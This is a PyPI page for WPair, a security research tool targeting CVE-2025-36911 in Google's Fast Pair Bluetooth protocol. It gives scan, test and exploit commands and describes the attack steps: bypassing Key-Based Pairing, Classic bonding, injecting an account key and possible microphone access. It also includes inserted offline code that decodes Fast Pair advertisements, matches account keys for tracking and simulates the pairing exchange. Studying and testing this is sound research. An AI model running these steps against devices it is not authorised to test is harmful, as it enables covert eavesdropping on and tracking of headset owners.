CVE-2025-36911 Fast Pair vulnerability scanner
WPair - CVE-2025-36911 Fast Pair Vulnerability Scanner
WPair is a defensive security research tool that demonstrates the CVE-2025-36911 vulnerability in Google's Fast Pair protocol.
⚠️ SECURITY RESEARCH TOOL - AUTHORIZED USE ONLY ⚠️
This tool is provided for:
- Security research and education
- Testing devices you OWN
- Authorized penetration testing with written permission
Unauthorized access to computer systems is ILLEGAL.
Violators will be prosecuted under applicable laws including:
- Computer Fraud and Abuse Act (USA)
- Computer Misuse Act (UK)
- Similar legislation in your jurisdiction
By using this tool, you agree to use it responsibly and legally.
What is CVE-2025-36911?
CVE-2025-36911 (also known as "WhisperPair") is a vulnerability in Google's Fast Pair protocol that affects millions of Bluetooth audio devices worldwide.
Impact:
- Unauthorized Bluetooth pairing without user consent
- Microphone access via Hands-Free Profile (HFP)
- Persistent device tracking via Account Key injection
CVSS Score: 8.1 (High)
Affected Devices: JBL, Sony, Google Pixel Buds, Anker, Nothing, OnePlus, Beats, Bose, Jabra, Xiaomi, and many others.
Installation
From PyPI (when published)
pip install wpair
From Source
git clone https://github.com/markmysler/wpair-cli.git
cd wpair-cli
pip install -e ".[dev]"
Usage
1. Scan for Fast Pair Devices
Discover nearby Bluetooth devices advertising Fast Pair service:
wpair scan --timeout 30
Options:
--timeout N - Scan duration in seconds (default: 30)
--all - Scan all BLE devices, not just Fast Pair
Example output:
┏━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━┳━━━━━━━━━┓
┃ Name ┃ Address ┃ Model ID ┃ Signal ┃ Status ┃
┡━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━╇━━━━━━━━━┩
│ Pixel Buds Pro 2 │ AA:BB:CC:DD:EE:FF│ 30018E │ ████ │ Unknown │
│ Sony WF-1000XM4 │ 11:22:33:44:55:66│ CD8256 │ ███ │ Unknown │
└────────────────────┴──────────────────┴──────────┴────────┴─────────┘
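To make concrete what the scan step is decoding, here is an added example (this editor's code, not code from the wpair project) that parses the 0xFE2C service data out of a raw BLE advertising payload and distinguishes the two advertisement forms the Fast Pair service spec defines: the 3-byte Model ID a device broadcasts while in pairing mode (the "Model ID" column above), and the account key filter plus salt a device broadcasts once it holds account keys. The filter construction (SHA-256 of key||salt, eight 32-bit chunks reduced modulo the filter size in bits, filter size floor(1.2n)+3 bytes) follows the published spec as this editor reads it; the account key, salt, device names and payload bytes are constructed for the example, not captured from real devices. The filter is the mechanism behind the "persistent device tracking via Account Key injection" impact listed above: whoever holds a key that was written to the device can recognise it from its passive advertisements, which is exactly what `filter_contains` does.

```python
"""Decode Fast Pair (0xFE2C) service data from a raw BLE advertisement; build/match account key filters."""
import hashlib
from dataclasses import dataclass
from typing import List, Optional, Tuple

FAST_PAIR_UUID = 0xFE2C
AD_SERVICE_DATA_16 = 0x16       # AD type: service data with 16-bit UUID
AD_COMPLETE_LOCAL_NAME = 0x09
# field types (low nibble of the 0bLLLLTTTT length-type byte) inside non-discoverable service data
FIELD_FILTER_SHOW_UI, FIELD_SALT, FIELD_FILTER_HIDE_UI = 0x0, 0x1, 0x2


def parse_ad_structures(adv: bytes) -> List[Tuple[int, bytes]]:
    """Split an advertising payload into (AD type, data); the length byte counts the type byte."""
    out, i = [], 0
    while i < len(adv):
        length = adv[i]
        if length == 0:                      # zero-length structure ends the payload
            break
        if i + 1 + length > len(adv):
            raise ValueError("truncated AD structure")
        out.append((adv[i + 1], bytes(adv[i + 2:i + 1 + length])))
        i += 1 + length
    return out


def fast_pair_service_data(adv: bytes) -> Optional[bytes]:
    """Return the 0xFE2C service data with the UUID stripped, or None if the device is not Fast Pair."""
    for ad_type, data in parse_ad_structures(adv):
        if ad_type == AD_SERVICE_DATA_16 and int.from_bytes(data[:2], "little") == FAST_PAIR_UUID:
            return data[2:]
    return None


def local_name(adv: bytes) -> str:
    return next((d.decode("utf-8", "replace") for t, d in parse_ad_structures(adv)
                 if t == AD_COMPLETE_LOCAL_NAME), "")


@dataclass
class FastPairAdv:
    mode: str                                # "pairing" or "non-discoverable"
    model_id: Optional[str] = None           # 3-byte Model ID, pairing mode only
    account_key_filter: Optional[bytes] = None
    salt: Optional[bytes] = None
    show_ui: bool = True


def decode_fast_pair(sd: bytes) -> FastPairAdv:
    if len(sd) == 3:                         # pairing mode: service data is just the Model ID
        return FastPairAdv(mode="pairing", model_id=sd.hex().upper())
    out, i = FastPairAdv(mode="non-discoverable"), 1   # byte 0 is version/flags; skip it
    while i < len(sd):
        length, ftype = sd[i] >> 4, sd[i] & 0x0F
        data = sd[i + 1:i + 1 + length]
        if ftype in (FIELD_FILTER_SHOW_UI, FIELD_FILTER_HIDE_UI):
            out.account_key_filter, out.show_ui = data, ftype == FIELD_FILTER_SHOW_UI
        elif ftype == FIELD_SALT:
            out.salt = data
        i += 1 + length                      # other field types (battery, ...) are skipped
    return out


def _bit_positions(account_key: bytes, salt: bytes, size: int) -> List[int]:
    """Spec: SHA-256(key || salt), eight big-endian u32 chunks, each reduced mod (size * 8)."""
    h = hashlib.sha256(account_key + salt).digest()
    return [int.from_bytes(h[j:j + 4], "big") % (size * 8) for j in range(0, 32, 4)]


def build_account_key_filter(keys: List[bytes], salt: bytes) -> bytes:
    size = int(len(keys) * 1.2) + 3          # spec sizing: floor(1.2 n) + 3 bytes
    filt = bytearray(size)
    for k in keys:
        for m in _bit_positions(k, salt, size):
            filt[m // 8] |= 1 << (m % 8)
    return bytes(filt)


def filter_contains(filt: bytes, salt: bytes, key: bytes) -> bool:
    """What a Seeker, or a tracker holding an injected key, does to recognise its key."""
    return all(filt[m // 8] & (1 << (m % 8)) for m in _bit_positions(key, salt, len(filt)))


def build_adv(name: bytes, service_data: bytes) -> bytes:
    """Assemble a raw payload: one 0xFE2C service data structure plus a complete local name."""
    sd = FAST_PAIR_UUID.to_bytes(2, "little") + service_data
    return (bytes([len(sd) + 1, AD_SERVICE_DATA_16]) + sd
            + bytes([len(name) + 1, AD_COMPLETE_LOCAL_NAME]) + name)


def non_discoverable_service_data(keys: List[bytes], salt: bytes) -> bytes:
    filt = build_account_key_filter(keys, salt)   # field lengths must fit a nibble (< 16 bytes)
    return (bytes([0x00, (len(filt) << 4) | FIELD_FILTER_SHOW_UI]) + filt
            + bytes([(len(salt) << 4) | FIELD_SALT]) + salt)


# Constructed sample data for this example; nothing here was captured from a real device.
SAMPLE_ACCOUNT_KEY = bytes.fromhex("04" + "11" * 15)   # Fast Pair account keys start with 0x04
SAMPLE_SALT = bytes.fromhex("c7")
PAIRING_ADV = build_adv(b"Pixel Buds Pro 2", bytes.fromhex("30018E"))
PAIRED_ADV = build_adv(b"WF-1000XM4", non_discoverable_service_data([SAMPLE_ACCOUNT_KEY], SAMPLE_SALT))


def classify_adv(adv: bytes) -> str:
    """One-line summary per advertisement, in the spirit of the scan table above."""
    sd = fast_pair_service_data(adv)
    if sd is None:
        return f"{local_name(adv)}: not Fast Pair"
    fp = decode_fast_pair(sd)
    if fp.mode == "pairing":
        return f"{local_name(adv)}: pairing mode, Model ID {fp.model_id}"
    known = (fp.account_key_filter is not None and fp.salt is not None
             and filter_contains(fp.account_key_filter, fp.salt, SAMPLE_ACCOUNT_KEY))
    return f"{local_name(adv)}: non-discoverable, sample account key present={known}"


if __name__ == "__main__":
    for adv in (PAIRING_ADV, PAIRED_ADV):
        print(classify_adv(adv))
```

Note the asymmetry the filter creates: a device in pairing mode leaks only its Model ID, but a device that has been given an account key keeps answering "is key K among mine?" to every passive listener for as long as that key stays in NVRAM, which is why the page treats Account Key injection as a persistence and tracking problem rather than a one-off pairing problem.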
2. Test a Device for Vulnerability (Non-Invasive)
Test if a device is vulnerable without exploiting or pairing:
wpair test AA:BB:CC:DD:EE:FF
This is a non-invasive check: it writes a single Key-Based Pairing request to the device's KBP characteristic and classifies the device from the GATT response or error code it gets back. It does not complete pairing and does not modify the device.
Output:
VULNERABLE - Device accepts unauthenticated pairing requests
PATCHED - Device correctly rejects unauthorized requests
ERROR - Test inconclusive (device may already be paired)
3. Exploit (Authorized Testing ONLY)
⚠️ WARNING: This performs actual exploitation. Use only on devices you own.
wpair exploit AA:BB:CC:DD:EE:FF --confirm
The --confirm flag is required and serves as acknowledgment that you own the device or have explicit written permission.
What this does:
- Bypasses Key-Based Pairing authentication
- Establishes Bluetooth Classic bonding
- Writes persistent Account Key to device
- May enable microphone access via the Hands-Free Profile (HFP)
4. About CVE-2025-36911
Display detailed information about the vulnerability:
wpair about
Features
| Feature | Description |
|---|---|
| BLE Scanner | Discovers Fast Pair devices broadcasting the 0xFE2C service UUID |
| Vulnerability Tester | Non-invasive check of whether a device is patched against CVE-2025-36911 |
| Exploit Demonstration | Full proof-of-concept for authorized security testing |
| Device Database | 20+ known vulnerable device models with quirks handling |
| Multi-Strategy Exploitation | 4 different KBP request strategies with automatic fallback |
| Progress Tracking | Real-time progress display with Rich terminal UI |
How It Works
Attack Overview
The attack exploits a weakness in Google's Fast Pair Key-Based Pairing (KBP) protocol:
- Discovery: Scan for devices advertising Fast Pair service (UUID 0xFE2C)
- KBP Request: Send unauthenticated Key-Based Pairing request
- Address Extraction: Parse BR/EDR address from response
- Classic Bonding: Pair via Bluetooth Classic
- Account Key Injection: Write persistent tracking identifier
Technical Details
- Protocol: Google Fast Pair (GATT-based BLE service)
- Vulnerability: Insufficient authentication in Key-Based Pairing
- Crypto: ECDH on secp256r1 to derive a shared secret; AES-128-ECB (key = first 16 bytes of SHA-256 of the shared secret) for the KBP request and response
- Persistence: Account Key stored in device NVRAM
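The five-step overview and the Technical Details above describe the KBP exchange in prose; the following is an added example (this editor's code, not wpair's) that runs both sides of one KBP round trip in a single process using the spec's key schedule (ECDH on secp256r1, AES-128-ECB under SHA-256(shared secret)[:16]) and the 16-byte request/response layouts (type byte, flags, Provider BLE address, salt; type byte, Provider BR/EDR address, salt). It assumes the `cryptography` package is installed. The Provider's BLE and BR/EDR addresses, its anti-spoofing key pair, and the VULNERABLE/PATCHED split (modeled as whether the device answers a KBP write while it is not in pairing mode) are this example's constructions; that split is a simplification of the page's "accepts unauthenticated pairing requests", not a statement about the exact firmware defect. A rejected write is returned as `None`, standing in for the GATT error that the `wpair test` step interprets.

```python
"""Fast Pair Key-Based Pairing (KBP), Seeker and Provider sides, run offline in one process."""
import hashlib
import os
from dataclasses import dataclass, field
from typing import Optional

from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

MSG_KBP_REQUEST = 0x00   # byte 0 of the 16-byte plaintext request
MSG_KBP_RESPONSE = 0x01  # byte 0 of the 16-byte plaintext response


def raw_public(private_key) -> bytes:
    """64-byte X||Y, the form the Seeker appends to its encrypted request (0x04 prefix dropped)."""
    pub = private_key.public_key().public_bytes(
        serialization.Encoding.X962, serialization.PublicFormat.UncompressedPoint)
    return pub[1:]


def derive_kbp_key(private_key, peer_raw_pub: bytes) -> bytes:
    """Spec key schedule: AES-128 key = first 16 bytes of SHA-256(ECDH shared secret x-coordinate)."""
    peer = ec.EllipticCurvePublicKey.from_encoded_point(ec.SECP256R1(), b"\x04" + peer_raw_pub)
    shared_x = private_key.exchange(ec.ECDH(), peer)
    return hashlib.sha256(shared_x).digest()[:16]


def aes_ecb(key: bytes, block: bytes, encrypt: bool) -> bytes:
    """Single-block AES-ECB, which is all KBP uses for its fixed 16-byte messages."""
    cipher = Cipher(algorithms.AES(key), modes.ECB())
    op = cipher.encryptor() if encrypt else cipher.decryptor()
    return op.update(block) + op.finalize()


@dataclass
class Provider:
    """Headset side. `patched` models firmware that answers KBP only in pairing mode;
    this is the example's (assumed) simplification of the page's VULNERABLE/PATCHED split."""
    ble_addr: bytes      # 6 bytes, the address the Seeker saw in the advertisement
    bredr_addr: bytes    # 6 bytes, the address an attacker needs for Classic bonding
    pairing_mode: bool
    patched: bool
    anti_spoofing_key: ec.EllipticCurvePrivateKey = field(
        default_factory=lambda: ec.generate_private_key(ec.SECP256R1()))

    def anti_spoofing_public(self) -> bytes:
        """The public half is what Google's registry serves for a Model ID, so any Seeker has it."""
        return raw_public(self.anti_spoofing_key)

    def handle_kbp_write(self, payload: bytes) -> Optional[bytes]:
        """GATT write to the KBP characteristic: 16-byte encrypted request || 64-byte Seeker public key.
        Returns the encrypted response, or None in place of the GATT error a rejecting device sends."""
        if len(payload) != 80:
            return None
        try:
            key = derive_kbp_key(self.anti_spoofing_key, payload[16:])
        except ValueError:
            return None  # not a valid secp256r1 point
        req = aes_ecb(key, payload[:16], encrypt=False)
        if req[0] != MSG_KBP_REQUEST or req[2:8] != self.ble_addr:
            return None  # garbage under this key, or addressed to another device
        if self.patched and not self.pairing_mode:
            return None  # user-intent gate: stay silent unless the user put us in pairing mode
        resp = bytes([MSG_KBP_RESPONSE]) + self.bredr_addr + os.urandom(9)
        return aes_ecb(key, resp, encrypt=True)


def seeker_kbp(provider: Provider, anti_spoofing_pub: bytes) -> Optional[bytes]:
    """Seeker/attacker side: one KBP round trip; returns the Provider's BR/EDR address or None."""
    seeker_key = ec.generate_private_key(ec.SECP256R1())
    key = derive_kbp_key(seeker_key, anti_spoofing_pub)
    # request: type, flags (0x00 here), Provider's current BLE address, 8 bytes of salt
    req = bytes([MSG_KBP_REQUEST, 0x00]) + provider.ble_addr + os.urandom(8)
    enc_resp = provider.handle_kbp_write(aes_ecb(key, req, encrypt=True) + raw_public(seeker_key))
    if enc_resp is None:
        return None
    resp = aes_ecb(key, enc_resp, encrypt=False)
    return resp[1:7] if resp[0] == MSG_KBP_RESPONSE else None   # "Address Extraction" step


def classify(provider: Provider) -> str:
    """Mirror of the page's non-invasive test: probe a device that is NOT in pairing mode."""
    assert not provider.pairing_mode, "probe only makes sense outside pairing mode"
    return "PATCHED" if seeker_kbp(provider, provider.anti_spoofing_public()) is None else "VULNERABLE"


if __name__ == "__main__":
    common = dict(ble_addr=bytes.fromhex("aabbccddeeff"), bredr_addr=bytes.fromhex("112233445566"))
    for patched in (False, True):
        dev = Provider(pairing_mode=False, patched=patched, **common)
        print("patched" if patched else "vulnerable", "firmware ->", classify(dev))
```

The point the round trip makes visible: everything the Seeker needs to pass the Provider's checks (the anti-spoofing public key, via the Model ID, and the Provider's current BLE address, via the advertisement) is public, so the cryptography alone proves nothing about who is asking. Whether the device also demands user intent before answering is what separates the two firmware behaviours modeled here, and it is the only thing the probe can observe from outside.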
Known Vulnerable Devices
WPair includes a database of 20+ confirmed vulnerable devices:
- Google Pixel Buds (multiple models)
- Sony WF-1000XM4, WH-1000XM5
- JBL Tune Buds, Live Pro 2
- Nothing Ear, Ear (a), Ear (2)
- OnePlus Buds Pro 2
- Beats Studio Buds+
- Anker Soundcore Liberty 4 NC
See wpair/database/known_devices.py for full list.
Architecture
wpair/
├── core/ # Core functionality
│ ├── device.py # Device data models
│ ├── scanner.py # BLE scanner
│ ├── vulnerability_tester.py # Non-invasive testing
│ └── exploit.py # Exploitation engine
├── bluetooth/ # Bluetooth adapters
│ └── classic_adapter.py # BR/EDR pairing
├── crypto/ # Cryptography
│ ├── ecdh.py # ECDH key exchange
│ └── aes.py # AES encryption
├── database/ # Known devices database
├── ui/ # User interface
│ └── terminal.py # Rich-based TUI
└── cli.py # Click-based CLI
Legal and Ethical Usage
⚠️ CRITICAL: Read Before Use
This tool is for AUTHORIZED security testing ONLY.
✅ Allowed:
- Testing your own devices
- Authorized penetration testing with written permission
- Academic security research in controlled environments
- Defensive security to identify vulnerable devices
❌ FORBIDDEN:
- Testing devices you do not own
- Unauthorized access to any device
- Malicious use or privacy violations
Legal Consequences
Unauthorized access to Bluetooth devices is ILLEGAL under:
- USA: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
- UK: Computer Misuse Act 1990
- EU: Directive 2013/40/EU
- Similar legislation worldwide
By using this tool, you agree to use it only on devices you own or have explicit written permission to test.
Development
Setup Development Environment
python -m venv venv
source venv/bin/activate # or venv\Scripts\activate on Windows
pip install -e ".[dev]"
Run Tests
pytest
Code Formatting
black wpair/
ruff check wpair/
Type Checking
mypy wpair/
Credits
Original Research Team - KU Leuven, Belgium
| Researcher | Affiliation |
|---|---|
| Sayon Duttagupta | COSIC Group |
| Nikola Antonijević | COSIC Group |
| Bart Preneel | COSIC Group |
| Seppe Wyns | DistriNet Group |
| Dave Singelée | DistriNet Group |
Funding: Flemish Government Cybersecurity Research Program (VOEWICS02)
Resources:
License
This project is licensed under the Apache License 2.0 - see the LICENSE file for details.
Disclaimer
This application is an independent implementation created for security research purposes. The original KU Leuven researchers discovered and disclosed the vulnerability but have not released any code and are not affiliated with this project. Their inclusion in credits is solely to acknowledge their research contribution.
Built for the security research community.
File details
Details for the file wpair-1.0.0.tar.gz.
File metadata
- Download URL: wpair-1.0.0.tar.gz
- Upload date:
- Size: 43.6 kB
- Tags: Source
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.7
File hashes
| Algorithm | Hash digest |
|---|---|
| SHA256 | 08046320eb22bd0ab7a3367a7b58acea050683a50e646cf4e6e15d472894943c |
| MD5 | bec309fe11234f441eb4578961c8b510 |
| BLAKE2b-256 | 3c33b389e8106a953e063258f1e0e40f3a45ed638a6e5398501820e46de7222d |
Provenance
The following attestation bundles were made for wpair-1.0.0.tar.gz:
- Publisher: python-publish.yml on markmysler/wpair-cli
- Statement type: https://in-toto.io/Statement/v1
- Predicate type: https://docs.pypi.org/attestations/publish/v1
- Subject name: wpair-1.0.0.tar.gz
- Subject digest: 08046320eb22bd0ab7a3367a7b58acea050683a50e646cf4e6e15d472894943c
- Sigstore transparency entry: 834897030
- Sigstore integration time:
- Permalink: markmysler/wpair-cli@57add1e6c070223757f8ad74328b4f693199b9d9
- Branch / Tag: refs/tags/1.0.0
- Owner: https://github.com/markmysler
- Access: public
- Token Issuer: https://token.actions.githubusercontent.com
- Runner Environment: github-hosted
- Publication workflow: python-publish.yml@57add1e6c070223757f8ad74328b4f693199b9d9
- Trigger Event: release
File details
Details for the file wpair-1.0.0-py3-none-any.whl.
File metadata
- Download URL: wpair-1.0.0-py3-none-any.whl
- Upload date:
- Size: 26.9 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.13.7
File hashes
| Algorithm | Hash digest |
|---|---|
| SHA256 | cbd31a26e0f0c6c44b880134ed7c648689f1000385b2d1d2c66e297a763e3dd6 |
| MD5 | 767f9a61a3820426ca36041b982643ba |
| BLAKE2b-256 | bd1d098a441c30da323212b1f464e8aea38f0bb05d3482d0fe40611ba6b0c7e7 |
Provenance
The following attestation bundles were made for wpair-1.0.0-py3-none-any.whl:
- Publisher: python-publish.yml on markmysler/wpair-cli
- Statement type: https://in-toto.io/Statement/v1
- Predicate type: https://docs.pypi.org/attestations/publish/v1
- Subject name: wpair-1.0.0-py3-none-any.whl
- Subject digest: cbd31a26e0f0c6c44b880134ed7c648689f1000385b2d1d2c66e297a763e3dd6
- Sigstore transparency entry: 834897049
- Sigstore integration time:
- Permalink: markmysler/wpair-cli@57add1e6c070223757f8ad74328b4f693199b9d9
- Branch / Tag: refs/tags/1.0.0
- Owner: https://github.com/markmysler
- Access: public
- Token Issuer: https://token.actions.githubusercontent.com
- Runner Environment: github-hosted
- Publication workflow: python-publish.yml@57add1e6c070223757f8ad74328b4f693199b9d9
- Trigger Event: release